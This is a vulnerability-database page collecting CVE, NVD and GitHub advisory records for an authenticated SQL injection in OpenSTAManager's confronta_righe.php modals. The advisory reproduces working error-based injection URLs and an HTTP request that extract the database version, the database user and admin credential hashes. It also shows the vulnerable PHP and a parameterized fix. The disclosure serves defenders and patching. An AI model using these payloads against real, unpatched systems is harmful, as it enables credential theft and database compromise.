CVE-2026-35470 (GCVE-0-2026-35470)
Vulnerability from cvelistv5 – Published: 2026-04-06 17:40 – Updated: 2026-04-07 14:06
VLAI?
Title
OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2.
Severity ?
8.8 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| devcode-it | openstamanager |
Affected:
< 2.10.2
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-35470",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-07T14:06:23.923426Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:06:27.500Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "openstamanager",
"vendor": "devcode-it",
"versions": [
{
"status": "affected",
"version": "\u003c 2.10.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET[\u0027righe\u0027] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-06T17:40:32.973Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39"
},
{
"name": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
}
],
"source": {
"advisory": "GHSA-mmm5-3g4x-qw39",
"discovery": "UNKNOWN"
},
"title": "OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-35470",
"datePublished": "2026-04-06T17:40:32.973Z",
"dateReserved": "2026-04-02T20:49:44.453Z",
"dateUpdated": "2026-04-07T14:06:27.500Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-35470",
"date": "2026-04-16",
"epss": "0.00034",
"percentile": "0.09788"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-35470\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-06T18:16:44.400\",\"lastModified\":\"2026-04-14T19:58:01.767\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET[\u0027righe\u0027] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.10.2\",\"matchCriteriaId\":\"37690084-64E6-4E8B-8A92-8B55C8FC1E9F\"}]}]}],\"references\":[{\"url\":\"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-35470\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-07T14:06:23.923426Z\"}}}], \"references\": [{\"url\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-07T14:06:17.311Z\"}}], \"cna\": {\"title\": \"OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals\", \"source\": {\"advisory\": \"GHSA-mmm5-3g4x-qw39\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"devcode-it\", \"product\": \"openstamanager\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.10.2\"}]}], \"references\": [{\"url\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39\", \"name\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\", \"name\": \"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET[\u0027righe\u0027] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-06T17:40:32.973Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-35470\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-07T14:06:27.500Z\", \"dateReserved\": \"2026-04-02T20:49:44.453Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-06T17:40:32.973Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-MMM5-3G4X-QW39
Vulnerability from github – Published: 2026-04-03 21:57 – Updated: 2026-04-03 21:57
VLAI?
Summary
OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals
Details
Description
Six confronta_righe.php files across different modules in OpenSTAManager <= 2.10.1 contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation.
An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data.
Affected Files
All 6 vulnerable files share the same code pattern:
| # | File | Line | Affected Table |
|---|---|---|---|
| 1 | modules/fatture/modals/confronta_righe.php |
29 | co_righe_documenti |
| 2 | modules/interventi/modals/confronta_righe.php |
29 | in_righe_interventi |
| 3 | modules/preventivi/modals/confronta_righe.php |
28 | co_righe_preventivi |
| 4 | modules/ordini/modals/confronta_righe.php |
29 | or_righe_ordini |
| 5 | modules/ddt/modals/confronta_righe.php |
29 | dt_righe_ddt |
| 6 | modules/contratti/modals/confronta_righe.php |
28 | co_righe_contratti |
Vulnerable Code
All files follow the same pattern. Example from modules/interventi/modals/confronta_righe.php:
$righe = $_GET['righe']; // Line 29 — No sanitization
$righe = $dbo->fetchArray(
'SELECT
`mg_articoli_lang`.`title`,
`mg_articoli`.`codice`,
`in_righe_interventi`.*
FROM
`in_righe_interventi`
INNER JOIN `mg_articoli` ON `mg_articoli`.`id` = `in_righe_interventi`.`idarticolo`
LEFT JOIN `mg_articoli_lang` ON (...)
WHERE
`in_righe_interventi`.`id` IN ('.$righe.')' // Line 41 — Direct concatenation
);
The value of $_GET['righe'] is inserted directly into the SQL IN() clause without using prepare(), parameterized statements or any sanitization function.
Reproduction
Prerequisites
- Authenticated session (any user with module access)
- At least one existing record in the target module (e.g. an intervention with id=1)
Step 1: Extract MySQL version
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT VERSION())))%23
Result: XPATH syntax error: '~8.3.0'
Step 2: Extract database user
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER())))%23
Result: XPATH syntax error: '~root@172.19.0.3'
Step 3: Extract admin credentials
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,0x3a,password) FROM zz_users LIMIT 1)))%23
Result: XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'
Evidence
HTTP Request
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(username,0x3a,password)%20FROM%20zz_users%20LIMIT%201)))%23 HTTP/1.1
Host: <TARGET>
Cookie: PHPSESSID=<SESSION_ID>
Response (excerpt)
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'
Impact
- Confidentiality (High): Full database data extraction including user credentials (bcrypt hashes), customer data, invoices, contracts and any stored information
- Integrity (High): Data modification via injected INSERT/UPDATE/DELETE statements through stacked queries or subqueries
- Availability (High): Deletion of tables or critical data, database corruption
Remediation
Recommended Fix
Use parameterized statements with prepare() for the righe parameter:
// BEFORE (vulnerable):
$righe = $_GET['righe'];
$righe = $dbo->fetchArray(
'... WHERE `in_righe_interventi`.`id` IN ('.$righe.')'
);
// AFTER (secure):
$righe_ids = array_map('intval', explode(',', $_GET['righe'] ?? ''));
$placeholders = implode(',', array_fill(0, count($righe_ids), '?'));
$righe = $dbo->fetchArray(
'... WHERE `in_righe_interventi`.`id` IN ('.$placeholders.')',
$righe_ids
);
This fix must be applied to all 6 files listed in the "Affected Files" section.
Credits
Omar Ramirez
Severity ?
8.8 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.10.1"
},
"package": {
"ecosystem": "Packagist",
"name": "devcode-it/openstamanager"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.10.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35470"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T21:57:08Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Description\n\nSix `confronta_righe.php` files across different modules in OpenSTAManager \u003c= 2.10.1 contain an SQL Injection vulnerability. The `righe` parameter received via `$_GET[\u0027righe\u0027]` is directly concatenated into an SQL query without any sanitization, parameterization or validation.\n\nAn authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data.\n\n## Affected Files\n\nAll 6 vulnerable files share the same code pattern:\n\n| # | File | Line | Affected Table |\n|---|------|------|----------------|\n| 1 | `modules/fatture/modals/confronta_righe.php` | 29 | `co_righe_documenti` |\n| 2 | `modules/interventi/modals/confronta_righe.php` | 29 | `in_righe_interventi` |\n| 3 | `modules/preventivi/modals/confronta_righe.php` | 28 | `co_righe_preventivi` |\n| 4 | `modules/ordini/modals/confronta_righe.php` | 29 | `or_righe_ordini` |\n| 5 | `modules/ddt/modals/confronta_righe.php` | 29 | `dt_righe_ddt` |\n| 6 | `modules/contratti/modals/confronta_righe.php` | 28 | `co_righe_contratti` |\n\n## Vulnerable Code\n\nAll files follow the same pattern. Example from `modules/interventi/modals/confronta_righe.php`:\n\n```php\n$righe = $_GET[\u0027righe\u0027]; // Line 29 \u2014 No sanitization\n\n$righe = $dbo-\u003efetchArray(\n \u0027SELECT\n `mg_articoli_lang`.`title`,\n `mg_articoli`.`codice`,\n `in_righe_interventi`.*\n FROM\n `in_righe_interventi`\n INNER JOIN `mg_articoli` ON `mg_articoli`.`id` = `in_righe_interventi`.`idarticolo`\n LEFT JOIN `mg_articoli_lang` ON (...)\n WHERE\n `in_righe_interventi`.`id` IN (\u0027.$righe.\u0027)\u0027 // Line 41 \u2014 Direct concatenation\n);\n```\n\nThe value of `$_GET[\u0027righe\u0027]` is inserted directly into the SQL `IN()` clause without using `prepare()`, parameterized statements or any sanitization function.\n\n## Reproduction\n\n### Prerequisites\n\n- Authenticated session (any user with module access)\n- At least one existing record in the target module (e.g. an intervention with id=1)\n\n### Step 1: Extract MySQL version\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3\u0026id_record=1\u0026righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT VERSION())))%23\n```\n\n**Result:** `XPATH syntax error: \u0027~8.3.0\u0027`\n\n### Step 2: Extract database user\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3\u0026id_record=1\u0026righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER())))%23\n```\n\n**Result:** `XPATH syntax error: \u0027~root@172.19.0.3\u0027`\n\n### Step 3: Extract admin credentials\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3\u0026id_record=1\u0026righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,0x3a,password) FROM zz_users LIMIT 1)))%23\n```\n\n**Result:** `XPATH syntax error: \u0027~admin:$2y$10$qAo04wNbhR9cpxjHzr\u0027`\n\n### Evidence\n\n\u003cimg width=\"1254\" height=\"395\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a2367ed6-fa03-4668-9d74-4298cac5e429\" /\u003e\n\n\n### HTTP Request\n\n```http\nGET /modules/interventi/modals/confronta_righe.php?id_module=3\u0026id_record=1\u0026righe=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(username,0x3a,password)%20FROM%20zz_users%20LIMIT%201)))%23 HTTP/1.1\nHost: \u003cTARGET\u003e\nCookie: PHPSESSID=\u003cSESSION_ID\u003e\n```\n\n### Response (excerpt)\n\n```\nSQLSTATE[HY000]: General error: 1105 XPATH syntax error: \u0027~admin:$2y$10$qAo04wNbhR9cpxjHzr\u0027\n```\n\n## Impact\n\n- **Confidentiality (High):** Full database data extraction including user credentials (bcrypt hashes), customer data, invoices, contracts and any stored information\n- **Integrity (High):** Data modification via injected INSERT/UPDATE/DELETE statements through stacked queries or subqueries\n- **Availability (High):** Deletion of tables or critical data, database corruption\n\n## Remediation\n\n### Recommended Fix\n\nUse parameterized statements with `prepare()` for the `righe` parameter:\n\n```php\n// BEFORE (vulnerable):\n$righe = $_GET[\u0027righe\u0027];\n$righe = $dbo-\u003efetchArray(\n \u0027... WHERE `in_righe_interventi`.`id` IN (\u0027.$righe.\u0027)\u0027\n);\n\n// AFTER (secure):\n$righe_ids = array_map(\u0027intval\u0027, explode(\u0027,\u0027, $_GET[\u0027righe\u0027] ?? \u0027\u0027));\n$placeholders = implode(\u0027,\u0027, array_fill(0, count($righe_ids), \u0027?\u0027));\n$righe = $dbo-\u003efetchArray(\n \u0027... WHERE `in_righe_interventi`.`id` IN (\u0027.$placeholders.\u0027)\u0027,\n $righe_ids\n);\n```\n\nThis fix must be applied to all **6 files** listed in the \"Affected Files\" section.\n\n## Credits\nOmar Ramirez",
"id": "GHSA-mmm5-3g4x-qw39",
"modified": "2026-04-03T21:57:08Z",
"published": "2026-04-03T21:57:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39"
},
{
"type": "PACKAGE",
"url": "https://github.com/devcode-it/openstamanager"
},
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals"
}
FKIE_CVE-2026-35470
Vulnerability from fkie_nvd - Published: 2026-04-06 18:16 - Updated: 2026-04-14 19:58
Severity ?
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2 | Product, Release Notes | |
| security-advisories@github.com | https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39 | Exploit, Mitigation, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39 | Exploit, Mitigation, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| devcode | openstamanager | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "37690084-64E6-4E8B-8A92-8B55C8FC1E9F",
"versionEndExcluding": "2.10.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET[\u0027righe\u0027] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2."
}
],
"id": "CVE-2026-35470",
"lastModified": "2026-04-14T19:58:01.767",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-06T18:16:44.400",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Release Notes"
],
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…